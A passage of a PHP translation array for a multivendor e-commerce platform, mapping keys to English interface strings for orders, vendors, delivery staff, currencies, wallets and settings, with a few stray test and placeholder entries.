enabled customers and seller will receive notifications on their devices', 'if_disabled_customers_and_seller_will_not_receive_notifications_on_their_devices' => 'If disabled customers and seller will not receive notifications on their devices', 'if_enabled_customers_will_receive_notifications_on_their_devices' => 'If enabled customers will receive notifications on their devices', 'if_disabled_customers_will_not_receive_notifications_on_their_devices' => 'If disabled customers will not receive notifications on their devices', 'Deliveryman_Assign_Message' => 'Deliveryman Assign Message', 'if_enabled_customers_and_deliveryman_will_receive_notifications_on_their_devices' => 'If enabled customers and deliveryman will receive notifications on their devices', 'if_disabled_customers_and_deliveryman_will_not_receive_notifications_on_their_devices' => 'If disabled customers and deliveryman will not receive notifications on their devices', 'Deliveryman_Start_Message' => 'Deliveryman Start Message', 'Deliveryman_Delivered_Message' => 'Deliveryman Delivered Message', 'Deliveryman_Reschedule_Message' => 'Deliveryman Reschedule Message', 'Want_to_Turn_ON_Notification_Status' => 'Want to Turn ON Notification Status', 'Want_to_Turn_OFF_Notification_Status' => 'Want to Turn OFF Notification Status', 'product_thumbnail_is_required!' => 'Product thumbnail is required!', 'category_is_required!' => 'Category is required!', 'unit_is_required!' => 'Unit is required!', 'code_must_be_positive!' => 'Code must be positive!', 'code_must_be_minimum_6_digits!' => 'Code must be minimum 6 digits!', 'minimum_order_quantity_is_required!' => 'Minimum order quantity is required!', 'minimum_order_quantity_must_be_positive!' => 'Minimum order quantity must be positive!', 'ready_product_upload_is_required!' => 'Ready product upload is required!', 'ready_product_upload_must_be_a_file_of_type' => 'Ready product upload must be a file of type', 'digital_product_type_is_required!' => 'Digital product type is required!', 'shipping_cost_is_required!' => 'Shipping cost is required!', 'Category_status' => 'Category status', 'if_enabled_this_category_it_will_be_visible_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage' => 'If enabled this category it will be visible from the category wise product section in the website and customer app in the homepage', 'if_disabled_this_category_it_will_be_hidden_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage' => 'If disabled this category it will be hidden from the category wise product section in the website and customer app in the homepage', 'if_enabled_this_brand_will_be_available_on_the_website_and_customer_app' => 'If enabled this brand will be available on the website and customer app', 'if_disabled_this_brand_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this brand will be hidden from the website and customer app', 'brands_not_found' => 'Brands not found', 'Want_to_Turn_ON_Customer_Reviews' => 'Want to Turn ON Customer Reviews', 'Want_to_Turn_OFF_Customer_Reviews' => 'Want to Turn OFF Customer Reviews', 'if_enabled_anyone_can_see_this_review_on_the_user_website_and_customer_app' => 'If enabled anyone can see this review on the user website and customer app', 'if_disabled_this_review_will_be_hidden_from_the_user_website_and_customer_app' => 'If disabled this review will be hidden from the user website and customer app', 'search_by_bonus_title' => 'Search by bonus title', 'minimum_amount_can_not_be_greater_than_bonus_amount' => 'Minimum amount can not be greater than bonus amount', 'create_Role' => 'Create Role', 'select_All' => 'Select All', 'employee_Roles' => 'Employee Roles', 'order management' => 'Order management', 'system settings' => 'System settings', 'Want_to_Turn_ON_Employee_Status' => 'Want to Turn ON Employee Status', 'Want_to_Turn_OFF_Employee_Status' => 'Want to Turn OFF Employee Status', 'when_the_status_is_enabled_employees_can_access_the_system_to_perform_their_responsibilities.' => 'When the status is enabled employees can access the system to perform their responsibilities.', 'when_the_status_is_disabled_employees_cannot_access_the_system_to_perform_their_responsibilities' => 'When the status is disabled employees cannot access the system to perform their responsibilities', 'are_you_sure_delete_this_role' => 'Are you sure delete this role', 'role_deleted_successfully' => 'Role deleted successfully', 'role' => 'Role', 'if_enabled_this_employee_can_log_in_to_the_system_and_perform_his_role' => 'If enabled this employee can log in to the system and perform his role', 'if_disabled_this_employee_can_not_log_in_to_the_system_and_perform_his_role' => 'If disabled this employee can not log in to the system and perform his role', 'invalid_customer' => 'Invalid customer', 'digital_Product_OTP_Verification' => 'Digital Product OTP Verification', 'OTP_Verification_Code' => 'OTP Verification Code', 'your_OTP_Verification_Code' => 'Your OTP Verification Code', 'feature_Deal' => 'Feature Deal', 'feature_deal_Table' => 'Feature deal Table', 'search by Title' => 'Search by Title', 'Want_to_Turn_ON_Featured_Deal_Status' => 'Want to Turn ON Featured Deal Status', 'Want_to_Turn_OFF_Featured_Deal_Status' => 'Want to Turn OFF Featured Deal Status', 'if_enabled_this_featured_deal_will_be_available_on_the_website_and_customer_app' => 'If enabled this featured deal will be available on the website and customer app', 'if_disabled_this_featured_deal_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this featured deal will be hidden from the website and customer app', 'feature_Deal_Update' => 'Feature Deal Update', 'update_feature_deal' => 'Update feature deal', 'deal_updated_successfully' => 'Deal updated successfully', 'Feature_Deal' => 'Feature Deal', 'Feature_Deal_for_this_season' => 'Feature Deal for this season', 'find_your_best_Feature_Deal_product' => 'Find your best Feature Deal product', 'find_best_Feature_Deal_product' => 'Find best Feature Deal product', 'Want_to_Turn_ON_Most_Demanded_Product_Status' => 'Want to Turn ON Most Demanded Product Status', 'Want_to_Turn_OFF_Most_Demanded_Product_Status' => 'Want to Turn OFF Most Demanded Product Status', 'if_enabled_this_most_demanded_product_will_be_available_on_the_website_and_customer_app' => 'If enabled this most demanded product will be available on the website and customer app', 'if_disabled_this_most_demanded_product_will_be_hidden_from_the_website_and_customer_app' => 'If disabled this most demanded product will be hidden from the website and customer app', 'find_your_best_featured_deal_product' => 'Find your best featured deal product', 'disabling_reCAPTCHA_may_leave_your_website_vulnerable_to_spam_and_malicious_activity_and_suspects_that_a_user_may_be_a_bot' => 'Disabling reCAPTCHA may leave your website vulnerable to spam and malicious activity and suspects that a user may be a bot', 'it_is_highly_recommended_to_keep_reCAPTCHA_enabled_to_ensure_the_security_and_integrity_of_your_website' => 'It is highly recommended to keep reCAPTCHA enabled to ensure the security and integrity of your website', 'Sorry_the_minimum_value_was_reached' => 'Sorry the minimum value was reached', 'Sorry_stock_limit_exceeded' => 'Sorry stock limit exceeded', 'if_you_enable_this_option_your_shop_will_be_shown_as_temporarily_closed_in_the_user_app_and_website_and_customers_cannot_add_products_from_your_shop' => 'If you enable this option your shop will be shown as temporarily closed in the user app and website and customers cannot add products from your shop', 'if_you_disable_this_option_your_shop_will_be_open_in_the_user_app_and_website_and_customers_can_add_products_from_your_shop' => 'If you disable this option your shop will be open in the user app and website and customers can add products from your shop', 'by_turning_on_temporary_close_mode_your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'customers_will_get_free_delivery_if_the_order_amount_exceeds_the_given_amount' => 'Customers will get free delivery if the order amount exceeds the given amount', 'and_the_given_amount_will_be_added_as_seller_expenses' => 'And the given amount will be added as seller expenses', 'Withdraw_request_has_been_sent' => 'Withdraw request has been sent', 'seller_Withdraw_Information' => 'Seller Withdraw Information', 'Seller_Payment_has_been_approved_successfully' => 'Seller Payment has been approved successfully', 'out for delivery' => 'Out for delivery', 'don t_miss_todays_deal' => 'Don t miss todays deal', 'admin_bonus' => 'Admin bonus', 'followed' => 'Followed', 123456 => '123456', 'add_new_field' => 'Add new field', 'o_Share_Via' => 'O Share Via', 'they_register' => 'They register', 'with_special_offer' => 'With special offer', 'Share_Via' => 'Share Via', 'product_reviews' => 'Product reviews', 'choose_Product' => 'Choose Product', 'choose_Customer' => 'Choose Customer', 'choose_Status' => 'Choose Status', 'from_Date' => 'From Date', 'Seller_has_been_approved_successfully' => 'Seller has been approved successfully', 'pi 3NzwTM2eZvKYlo2C0OAf5Mbg' => 'Pi 3NzwTM2eZvKYlo2C0OAf5Mbg', 'sub_Category_Setup' => 'Sub Category Setup', 'sub_category_name' => 'Sub category name', 'new_Sub_Category' => 'New Sub Category', 'main_Category' => 'Main Category', 'select_main_category' => 'Select main category', 'search_by_Sub_Category' => 'Search by Sub Category', 'are_you_sure_to_delete_this_sub_category' => 'Are you sure to delete this sub category', 'sub_Category_deleted_Successfully.' => 'Sub Category deleted Successfully.', 'sub' => 'Sub', 'sub_Sub_Category_Setup' => 'Sub Sub Category Setup', 'new_Sub_Sub_Category' => 'New Sub Sub Category', 'sub_category_Name' => 'Sub category Name', 'search_by_Sub_Sub_Category' => 'Search by Sub Sub Category', 'sub_Sub_Category_Deleted_Successfully' => 'Sub Sub Category Deleted Successfully', 'sub_Sub' => 'Sub Sub', 'Category_added_successfully' => 'Category added successfully', 'Category_updated_successfully' => 'Category updated successfully', 'category_updated_successfully' => 'Category updated successfully', 'sub_category_Image' => 'Sub category Image', 'Admin_also_reward_their_top_customers_with_wallet_money' => 'Admin also reward their top customers with wallet money', 'You_do_not_have_any' => 'You do not have any', 'transaction_yet' => 'Transaction yet', 'This_shop_is_temporary_closed_or_on_vacation' => 'This shop is temporary closed or on vacation', 'Chat_with_us_on_WhatsApp' => 'Chat with us on WhatsApp', 'Please_review_the_ratio_before_upload' => 'Please review the ratio before upload', 'you_do_not_have_any' => 'You do not have any', 'cannot_input_minus_value' => 'Cannot input minus value', 'order_number' => 'Order number', 'no_Transaction_Found' => 'No Transaction Found', 'Ex:_7+ character' => 'Ex: 7+ character', 'Ex:_7+_character' => 'Ex: 7+ character', 'password_Must_Be_8_Character' => 'Password Must Be 8 Character', 'Estimated_Delivery_Date' => 'Estimated Delivery Date', 'check_Now' => 'Check Now', 'select_a_payment_method_first' => 'Select a payment method first', 'say_something' => 'Say something', 'Your current payment settings are disabled because you have enabled payment gateway addon To visit your currently active payment gateway settings please follow the link.' => 'Your current payment settings are disabled because you have enabled payment gateway addon To visit your currently active payment gateway settings please follow the link.', 'addon_Menus' => 'Addon Menus', 'Sorry_stock_limit_exceeded.' => 'Sorry stock limit exceeded.', 'your_order_has_been_processed.' => 'Your order has been processed.', 'check_your_email_to_get_the_order_id_and_details.' => 'Check your email to get the order id and details.', 'Language_Added' => 'Language Added', 'Default_Language_Changed' => 'Default Language Changed', 'image_is_required' => 'Image is required', 'logo_name_is_required' => 'Logo name is required', 'banner_name_is_required' => 'Banner name is required', 'bottom_banner_name_is_required' => 'Bottom banner name is required', 'shop_address_is_required' => 'Shop address is required', 'shop_apply_successfully' => 'Shop apply successfully', 'Product_added_successfully' => 'Product added successfully', 'account _number' => 'Account number', 'select_Date_Type' => 'Select Date Type', 'Image_Not_found' => 'Image Not found', 'Digital_file_upload_successfully' => 'Digital file upload successfully', 'default-currency_setup' => 'Default-currency setup', 'add_currency' => 'Add currency', 'add_the_name_of_the_currency_you_want_to_add' => 'Add the name of the currency you want to add', 'add_the_symbol_of_the_currency_you_want_to_add' => 'Add the symbol of the currency you want to add', 'add_the_code_of_the_currency_you_want_to_add' => 'Add the code of the currency you want to add', 'Want_to_Turn_ON_Currency_Status' => 'Want to Turn ON Currency Status', 'Want_to_Turn_OFF_Currency_Status' => 'Want to Turn OFF Currency Status', 'if_enabled_this_currency_will_be_available_throughout_the_entire_system' => 'If enabled this currency will be available throughout the entire system', 'if_disabled_this_currency_will_be_hidden_from_the_entire_system' => 'If disabled this currency will be hidden from the entire system', 'currency_removed_successfully' => 'Currency removed successfully', 'this_Currency_cannot_be_removed_due_to_payment_gateway_dependency' => 'This Currency cannot be removed due to payment gateway dependency', 'customer_Review' => 'Customer Review', 'filter_Criteria' => 'Filter Criteria', 'search_Bar_Content' => 'Search Bar Content', 'Payment_success' => 'Payment success', 'hurry_Up' => 'Hurry Up', 'the_offer_is_limited' => 'The offer is limited', 'grab_while_it_lasts' => 'Grab while it lasts', 'top_sellers' => 'Top sellers', 'user_profile' => 'User profile', 'more_from_the_store' => 'More from the store', 'message_send_successfully' => 'Message send successfully', 'download_invoice' => 'Download invoice', 'rate_the_quality' => 'Rate the quality', 'very_good' => 'Very good', 'have_thoughts_to_share' => 'Have thoughts to share', 'best_product _highly_recommended' => 'Best product highly recommended', 'upload_images' => 'Upload images', 'the_product_is_good' => 'The product is good', 'very_Good' => 'Very Good', 'this_product_is_very_good_I_am_highly_impressed' => 'This product is very good I am highly impressed', 'give_a_refund_reason' => 'Give a refund reason', 'write_here' => 'Write here', 'send_request' => 'Send request', 'Assign' => 'Assign', '19 July 2023' => '19 July 2023', 'rate_the_delivery_quality' => 'Rate the delivery quality', 'best_delivery_service _highly_recommended' => 'Best delivery service highly recommended', 'the_delivery_service_is_good' => 'The delivery service is good', 'this_delivery_service_is_very_good_I_am_highly_impressed' => 'This delivery service is very good I am highly impressed', 'delivery_man_review' => 'Delivery man review', 'update_review' => 'Update review', 'Update_Review' => 'Update Review', 'you_have_saved' => 'You have saved', 'this_order_contains_one_or_more_digital_products.' => 'This order contains one or more digital products.', 'delivery_man_is_not_assigned_for_digital_products' => 'Delivery man is not assigned for digital products', 'this_order_is_a_POS_order.delivery_man_is_not_assigned_to_POS_orders' => 'This order is a POS order.delivery man is not assigned to POS orders', 'see_payment_details' => 'See payment details', 'payment_verification' => 'Payment verification', 'payment_information' => 'Payment information', 'due' => 'Due', 'you_have_Saved' => 'You have Saved', 'proceed_to_Next' => 'Proceed to Next', 'continue_Shopping' => 'Continue Shopping', 'Dark_Mode' => 'Dark Mode', 'Light_Mode' => 'Light Mode', 'Jhone' => 'Jhone', 880 => '880', 'OTP_has_been_sent_again' => 'OTP has been sent again', 'please_wait_for_new_code' => 'Please wait for new code', 'password_does_not_Match' => 'Password does not Match', 'you_can_review_after_the_product_is_delivered' => 'You can review after the product is delivered', 'you_can_refund_request_after_the_product_is_delivered' => 'You can refund request after the product is delivered', 'pi 3NzHbf2eZvKYlo2C098tVr0K' => 'Pi 3NzHbf2eZvKYlo2C098tVr0K', 'No_data_found_for_export' => 'No data found for export', 'ame' => 'Ame', 'add_new_contact_information' => 'Add new contact information', 'contact_name' => 'Contact name', 'contact_information_Table' => 'Contact information Table', 'Want_to_Turn_ON_Support_Ticket_Status' => 'Want to Turn ON Support Ticket Status', 'Want_to_Turn_OFF_Support_Ticket_Status' => 'Want to Turn OFF Support Ticket Status', 'if_enabled_this_support_ticket_will_be_active' => 'If enabled this support ticket will be active', 'if_disabled_this_support_ticket_will_be_inactive' => 'If disabled this support ticket will be inactive', 'for_customer' => 'For customer', 'for_seller' => 'For seller', 'for_delivery_man' => 'For delivery man', 'order_pending_message' => 'Order pending message', 'order_confirmation_message' => 'Order confirmation message', 'order_processing_message' => 'Order processing message', 'order_out_for_delivery_message' => 'Order out for delivery message', 'order_delivered_message' => 'Order delivered message', 'order_returned_message' => 'Order returned message', 'order_failed_message' => 'Order failed message', 'fund_added_by_admin_message' => 'Fund added by admin message', 'new_order_message' => 'New order message', 'order_cancellation_message' => 'Order cancellation message', 'refund_request_message' => 'Refund request message', 'order_edit_message' => 'Order edit message', 'withdraw_request_status_message' => 'Withdraw request status message', 'message_from_customer' => 'Message from customer', 'delivery_man_assign_by_admin_message' => 'Delivery man assign by admin message', 'refund_request_status_changed_by_admin' => 'Refund request status changed by admin', 'new_order_assigned_message' => 'New order assigned message', 'delivery_man_charge' => 'Delivery man charge', 'order_rescheduled_message' => 'Order rescheduled message', 'message_from_admin' => 'Message from admin', 'cash_collect_by_admin_message' => 'Cash collect by admin message', 'cash_collect_by_seller_message' => 'Cash collect by seller message', 'important_notice' => 'Important notice', 'to_include_specific_details_in_your_push_notification_message you_can_use_the_following_placeholders' => 'To include specific details in your push notification message you can use the following placeholders', 'the_name_of_the_delivery_person' => 'The name of the delivery person', 'the_unique_ID_of_the_order' => 'The unique ID of the order', 'the_expected_delivery_time' => 'The expected delivery time', 'the_name_of_the_user_who_placed_the_order' => 'The name of the user who placed the order', 'order place in pos' => 'Order place in pos', 'earned by referral' => 'Earned by referral', 'gdfgfdh' => 'Gdfgfdh', 'super_admin' => 'Super admin', 'search_delivery_man' => 'Search delivery man', 'no_Message_available' => 'No Message available', 'type_Something' => 'Type Something', 'add_New_Contact_Information' => 'Add New Contact Information', 'want_to_remove_this_information' => 'Want to remove this information', 'earning_Statement' => 'Earning Statement', 'earning_statement' => 'Earning statement', 'order_History_Log' => 'Order History Log', 'deliveryman_Wallet' => 'Deliveryman Wallet', 'cash_in_hand' => 'Cash in hand', 'collect_Cash' => 'Collect Cash', 'current_balance' => 'Current balance', 'total_withdrawn' => 'Total withdrawn', 'delivery_Man_Account' => 'Delivery Man Account', 'cash_Withdraw' => 'Cash Withdraw', 'total_Cash_In_Hand' => 'Total Cash In Hand', 'search_by_order_no' => 'Search by order no', 'current_status' => 'Current status', 'history' => 'History', 'employee_details' => 'Employee details', 'EMP' => 'EMP', 'join' => 'Join', 'access_abailable' => 'Access abailable', 'you_can_create_or_edit_role_form_employee_role_setup' => 'You can create or edit role form employee role setup', 'search_by_name_or_sku' => 'Search by name or sku', 'based_on_your_region_set_the_exchange_rate_of_the_currency_you_want_to_add' => 'Based on your region set the exchange rate of the currency you want to add', 'Currency_status_successfully_changed.' => 'Currency status successfully changed.', 'System_Default_currency_updated_successfully' => 'System Default currency updated successfully', 'Add_Fund_To_Wallet' => 'Add Fund To Wallet', 'welcome' => 'Welcome', 'Transaction Sucessfull' => 'Transaction Sucessfull', 'amount sucessfully credited to your wallet' => 'Amount sucessfully credited to your wallet', 'Rewared by company admin' => 'Rewared by company admin', 'dear' => 'Dear', 'Thank you for joinning with' => 'Thank you for joinning with', 'If you require any assistance or have feedback or suggestions about our site you can email us at' => 'If you require any assistance or have feedback or suggestions about our site you can email us at', 'All copy right reserved' => 'All copy right reserved', 'you_can_not_delete_all_images' => 'You can not delete all images', 'product_image_removed_successfully' => 'Product image removed successfully', 'no_product_found' => 'No product found', 'sorry_no_data_found_related_to_your_search' => 'Sorry no data found related to your search', 'all_Brands' => 'All Brands', 'company_reliability' => 'Company reliability', 'item_1' => 'Item 1', 'item_2' => 'Item 2', 'item_3' => 'Item 3', 'item_4' => 'Item 4', 'title 1000' => 'Title 1000', 'Title 2' => 'Title 2', 'title 3' => 'Title 3', 'total_shipping_cost' => 'Total shipping cost', 'no_ticket_found' => 'No ticket found', 'no_address_found' => 'No address found', 'my_Profile' => 'My Profile', 'top_Fashion_House' => 'Top Fashion House', 'type_your_message' => 'Type your message', 'my_support_tickets' => 'My support tickets', 'you_will_get_response_soon' => 'You will get response soon', 'leave_your_issue' => 'Leave your issue', 'Fast Delivery all across the country' => 'Fast Delivery all across the country', 'Send_Message_to_seller' => 'Send Message to seller', 'No review given yet' => 'No review given yet', 'log_in' => 'Log in', 'Enjoy_New_experience_Sign_Up' => 'Enjoy New experience Sign Up', 'high_to_Low_Price' => 'High to Low Price', 'saved_address' => 'Saved address', 'select_a_payment_method_to_proceed' => 'Select a payment method to proceed', 'go_back' => 'Go back', 'pay_via_Wallet' => 'Pay via Wallet', 'pay_via_online' => 'Pay via online', 'pay_offline' => 'Pay offline', 'admin_have_no_permission_for_sellers_digital_product_upload' => 'Admin have no permission for sellers digital product upload', 'view_Products' => 'View Products', 'Write_here' => 'Write here', 'Product_has_been_removed_from_wishlist' => 'Product has been removed from wishlist', 'Okay' => 'Okay', 'Your_Cart_is_Empty' => 'Your Cart is Empty', 'cash_on_Delivery' => 'Cash on Delivery', 'the_following_items_in_your_cart_are_currently_out_of_stock' => 'The following items in your cart are currently out of stock', 'Please_Login' => 'Please Login', 'You_need_to_login_to_view_this_feature' => 'You need to login to view this feature', 'Delete_this_address' => 'Delete this address', 'This_address_will_be_removed_from_this_list' => 'This address will be removed from this list', 'password must be 7+ Character' => 'Password must be 7+ Character', 'update_Currency' => 'Update Currency', 'currency_update' => 'Currency update', 'currency_Name' => 'Currency Name', 'currency_Symbol' => 'Currency Symbol', 'currency_Code' => 'Currency Code', 'exchange_Rate' => 'Exchange Rate', 'convert_your_loyalty_point_to_wallet_money' => 'Convert your loyalty point to wallet money', 'minimum' => 'Minimum', 'points_required_to_convert_into_currency' => 'Points required to convert into currency', 'Total Loyalty Point' => 'Total Loyalty Point', 'Convert point to wallet money' => 'Convert point to wallet money', 'Enters Point Amount' => 'Enters Point Amount', 'my_Wishlists' => 'My Wishlists', 'Product_added_to_wishlist' => 'Product added to wishlist', 'Free delivery across all over the country' => 'Free delivery across all over the country', 'safe payment' => 'Safe payment', 'alum' => 'Alum', 'payulum' => 'Payulum', 'lilum' => 'Lilum', 'EX: Bank XYZ' => 'EX: Bank XYZ', '02xxxxx' => '02xxxxx', 500 => '500', 'xRt56bgST6' => 'XRt56bgST6', 'insert_note' => 'Insert note', 'service_name' => 'Service name', 'Mobile Banking' => 'Mobile Banking', 'thsn767fTRY7' => 'Thsn767fTRY7', 'dd/mm/yy' => 'Dd/mm/yy', 'Product_review' => 'Product review', 'for_offline_payment_options _please_follow_the_steps_below' => 'For offline payment options please follow the steps below', 'Delete_this_ticket' => 'Delete this ticket', 'This_ticket_will_be_removed_from_this_list' => 'This ticket will be removed from this list', 'close_this_ticket' => 'Close this ticket', 'type_something' => 'Type something', 'no_review_found' => 'No review found', 'my_review' => 'My review', 'product_not_uploaded_yet' => 'Product not uploaded yet', 'currency_updated_successfully' => 'Currency updated successfully', 'value_is_greater_or_equal_to' => 'Value is greater or equal to', 'file_type_jpg_jpeg_png' => 'File type jpg jpeg png', 'maximum_size_2MB' => 'Maximum size 2MB', 'download_failed' => 'Download failed', 'update_successfully' => 'Update successfully', 'no_Data_found' => 'No Data found', 'no_earning_history_found' => 'No earning history found', 'delivery_Man_Earnings' => 'Delivery Man Earnings', 'delivery_Man_Information' => 'Delivery Man Information', 'earning_Analytics' => 'Earning Analytics', 'withdrawable_Balance' => 'Withdrawable Balance', 'total_Item' => 'Total Item', 'no_order_history_found' => 'No order history found', 'delivery_Man_Order_List' => 'Delivery Man Order List', 'search_Criteria' => 'Search Criteria', 'the' => 'The', 'field is required' => 'Field is required', 'The code has already been taken.' => 'The code has already been taken.', 'this_page_is_for_A4_size_page_printer_so_it_will_not_be_visible_in_smaller_devices.' => 'This page is for A4 size page printer so it will not be visible in smaller devices.', 'in_house_product_List' => 'In house product List', 'image_URL' => 'Image URL', 'sub_Category_Name' => 'Sub Category Name', 'sub_Sub_Category_Name' => 'Sub Sub Category Name', 'product_Tags' => 'Product Tags', 'Removed_successfully' => 'Removed successfully', 'review_status_updated' => 'Review status updated', 'Category is required!' => 'Category is required!', 'Brand 1' => 'Brand 1', 'limited_Stocked_Products_List' => 'Limited Stocked Products List', 'product_quantity_updated_successfully' => 'Product quantity updated successfully', 'products_imported_successfully' => 'Products imported successfully', 'credentials_do_not_match_or_your_account_has_been_suspended' => 'Credentials do not match or your account has been suspended', 'this_page_is_for_A4_size_page_printer_so_it_won t_be_visible_in_smaller_devices.' => 'This page is for A4 size page printer so it won t be visible in smaller devices.', 'invalid_product' => 'Invalid product', 'Vendor Test Product' => 'Vendor Test Product', 'download_the_format_file_and_fill_it_with_proper_data' => 'Download the format file and fill it with proper data', 'once_you_have-downloaded_and_filled_the_format_file_upload_it_in_the_form_below_and_submit.' => 'Once you have-downloaded and filled the format file upload it in the form below and submit.', 'after_uploading_products_you_need_to_edit_them_and_set_products_images_and_choices.' => 'After uploading products you need to edit them and set products images and choices.', 'you_can_upload_your_product_images_in_product_folder_from_gallery_and_copy_images_path.' => 'You can upload your product images in product folder from gallery and copy images path.', 'import_Products_File' => 'Import Products File', 'download_Format' => 'Download Format', 'al' => 'Al', 'filter_criteria' => 'Filter criteria', 'Total_Items' => 'Total Items', 'Item_Discount' => 'Item Discount', 'Vat/Tax' => 'Vat/Tax', 0 => '0', 'update Test test pro' => 'Update Test test pro', 'seen' => 'Seen', 'Cart_is_empty' => 'Cart is empty', 'admin_Earning_List' => 'Admin Earning List', 'deliveryMan_Incentive' => 'DeliveryMan Incentive', 'vendor_Earning' => 'Vendor Earning', 'today' => 'Today', 'deliveryman_incentive' => 'Deliveryman incentive', 'image_description' => 'Image description', 'product_Attribute_Setup' => 'Product Attribute Setup', 'in-House_Products' => 'In-House Products', 'vendor_Products' => 'Vendor Products', 'product_update_requests' => 'Product update requests', 'send_notification_svg' => 'Send notification svg', 'push_notifications_setup' => 'Push notifications setup', 'push_notification_svg' => 'Push notification svg', 'vendor_Sales' => 'Vendor Sales', 'vendors' => 'Vendors', 'add_New_Vendor' => 'Add New Vendor', 'vendor_List' => 'Vendor List', 'delivery_men' => 'Delivery men', 'business_Settings' => 'Business Settings', 'in-house_Shop' => 'In-house Shop', 'login_Settings' => 'Login Settings', 'themes_&_Addons' => 'Themes & Addons', '3rd_Party' => '3rd Party', 'other_Configurations' => 'Other Configurations', 'business_Pages' => 'Business Pages', 'React_website_configuration' => 'React website configuration', 'deleted_successfully' => 'Deleted successfully', 'the_file_upload_field_is_required' => 'The file upload field is required', 'status_updated_failed' => 'Status updated failed', 'do_you_want_to_sign_out' => 'Do you want to sign out', 'do_not_Logout' => 'Do not Logout', 'want_to_change_this_language' => 'Want to change this language', 'please_enter_a_valid_integer_for_current_stock' => 'Please enter a valid integer for current stock', 'at_least_8_characters' => 'At least 8 characters', 'at_least_one_uppercase_letter_' => 'At least one uppercase letter ', 'at_least_one_number' => 'At least one number', 'at_least_one_symbol' => 'At least one symbol', 'total_Vendor' => 'Total Vendor', 'total_Vendor_Products' => 'Total Vendor Products', 'vendor_Wallet_Status' => 'Vendor Wallet Status', 'vendor_Info' => 'Vendor Info', 'general_Settings' => 'General Settings', 'payment_options' => 'Payment options', 'only_the_Admin_Panel_&_Vendor_Panel_will_be_functional' => 'Only the Admin Panel & Vendor Panel will be functional', 'company_information' => 'Company information', 'new_business' => 'New business', '01xxxxxxxx' => '01xxxxxxxx', 'company@gmail.com' => 'Company@gmail.com', 'business_information' => 'Business information', 'website_header_logo' => 'Website header logo', 'website_footer_logo' => 'Website footer logo', 'loading_gif' => 'Loading gif', 'Environment_Settings' => 'Environment Settings', 'software_Update' => 'Software Update', 'site_Map' => 'Site Map', 'environment_information' => 'Environment information', 'EFood' => 'EFood', '00000000000000' => '00000000000000', 'OTP_&_Login_Attempts' => 'OTP & Login Attempts', 'login_Url' => 'Login Url', 'how_the_setting_works' => 'How the setting works', 'theme_Setup' => 'Theme Setup', 'minimum_customer_app_version' => 'Minimum customer app version', 'define_the_minimum_Android_app_version_for_best_user_experience' => 'Define the minimum Android app version for best user experience', 'if_a_user_still_don’t_have_it _they’ll_be_requested_a_force_app_update_when_they_opens_the_app' => 'If a user still don’t have it they’ll be requested a force app update when they opens the app', 'download_URL_for_customer_app' => 'Download URL for customer app', 'add_the_Android_app_download_URL_that_will_redirect_users_when_they_agree_to_update_the_app' => 'Add the Android app download URL that will redirect users when they agree to update the app', 'for_iOS' => 'For iOS', 'define_the_minimum_iOS_app_version_for_best_user_experience' => 'Define the minimum iOS app version for best user experience', 'if_a_user_still_don’t _have_it _they’ll_be_requested_a_force_app_update_when_they_opens_the_app' => 'If a user still don’t have it they’ll be requested a force app update when they opens the app', 'add_the_iOS_app_download_URL_that_will_redirect_users_when_they_agree_to_update_the_app' => 'Add the iOS app download URL that will redirect users when they agree to update the app', 'vendor_app_version_control' => 'Vendor app version control', 'minimum_Vendor_app_version' => 'Minimum Vendor app version', 'download_URL_For_Vendor_App' => 'Download URL For Vendor App', 'minimum_deliveryman_app_version' => 'Minimum deliveryman app version', 'what_is_app_version' => 'What is app version', 'this_app_version_means_the_minimum_version_of_Vendor_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'This app version means the minimum version of Vendor Deliveryman and Customer apps that are required for the update', 'app_download_link' => 'App download link', 'search_for_items' => 'Search for items', 'all_vendors' => 'All vendors', 'vendor_zone' => 'Vendor zone', 'become_a_vendor' => 'Become a vendor', 'vendor_login' => 'Vendor login', 'please_check_the_recaptcha.' => 'Please check the recaptcha.', 'password_do_not_match' => 'Password do not match', 'password_match' => 'Password match', 'all_input_field_required' => 'All input field required', 'sorry_stock_limit_exceeded' => 'Sorry stock limit exceeded', 'Please_Sign_in' => 'Please Sign in', 'You_need_to_Sign_in_to_view_this_feature' => 'You need to Sign in to view this feature', 'vendor_Apply' => 'Vendor Apply', 'shop_application' => 'Shop application', 'already_have_an_account' => 'Already have an account', 'congratulations' => 'Congratulations', 'your_registration_is_successful' => 'Your registration is successful', 'please-wait_for_admin_approval' => 'Please-wait for admin approval', ' you’ll_get_a_mail_soon' => ' you’ll get a mail soon', 'want_to_apply_as_a_vendor' => 'Want to apply as a vendor', 'Download_PDF' => 'Download PDF', 'vendor_Earning_Report' => 'Vendor Earning Report', 'deliveryman_Incentive' => 'Deliveryman Incentive', 'vendor_product_sale_Report' => 'Vendor product sale Report', 'vendor_Reports' => 'Vendor Reports', 'vendor-Info' => 'Vendor-Info', 'vendor_Report' => 'Vendor Report', 'website_shop_view' => 'Website shop view', 'approved_product_list' => 'Approved product list', 'new_product_request' => 'New product request', 'denied_product_request' => 'Denied product request', 'reports_&_analytics' => 'Reports & analytics', 'transactions_Report' => 'Transactions Report', 'order_report' => 'Order report', 'shop_Settings' => 'Shop Settings', 'upload_Image' => 'Upload Image', 'the_discount_price_will_not_larger_then_Variant_Price' => 'The discount price will not larger then Variant Price', 'contact_information_table' => 'Contact information table', 'want_to_Turn_ON_the_this_status' => 'Want to Turn ON the this status', 'want_to_Turn_OFF_the_this_status' => 'Want to Turn OFF the this status', 'copied_successfully' => 'Copied successfully', 'monitor_your_business_analytics_and_statistics' => 'Monitor your business analytics and statistics', 'order_statistics' => 'Order statistics', 'vendor' => 'Vendor', 'user_overview' => 'User overview', 'most_Popular_Products' => 'Most Popular Products', 'update_emergency_contact' => 'Update emergency contact', 'search_by_category_name' => 'Search by category name', 'there_were_' => 'There were ', '_products_under_this_category' => ' products under this category', 'please_update_their_category_from_the_below_list_before_deleting_this_one' => 'Please update their category from the below list before deleting this one', 'select_Category' => 'Select Category', 'name_is_required' => 'Name is required', 'country_code_is_required' => 'Country code is required', 'phone_is_required' => 'Phone is required', 'emergency_contact_added_successfully' => 'Emergency contact added successfully', 